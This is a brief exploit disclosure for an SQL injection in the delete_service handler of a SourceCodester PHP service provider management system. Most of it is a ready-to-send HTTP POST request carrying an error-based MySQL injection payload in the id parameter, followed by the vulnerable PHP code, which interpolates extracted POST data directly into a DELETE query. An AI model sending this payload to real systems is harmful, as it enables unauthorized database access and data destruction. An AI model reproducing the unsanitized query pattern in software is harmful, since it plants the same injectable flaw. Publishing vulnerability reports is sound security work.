Exploit Author: xiahao@webray.com.cn
Vendor Homepage: https://www.sourcecodester.com
Software Link: https://www.sourcecodester.com/download-code?nid=16501&title=Service+Provider+Management+System+using+PHP+and+MySQL+Source+Code+Free+Download
/classes/Master.php SQL injection exists for parameter Section
POST /classes/Master.php?f=delete_service HTTP/1.1
Host: 10.211.55.3:8001
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
id='+AND+GTID_SUBSET(CONCAT(0x717a6a7071%2Cmd5(1)%2C(SELECT+(ELT(8125%3D8125%2C1)))%2C0x71707a7071)%2C8125)--+jKyA
...
function delete_service(){
extract($_POST);
$del = $this->conn->query("DELETE FROM `service_list` where id = '{$id}'");
if($del){
$resp['status'] = 'success';
$this->settings->set_flashdata('success'," Service successfully deleted.");
}else{
$resp['status'] = 'failed';
$resp['error'] = $this->conn->error;
}
return json_encode($resp);
}
...
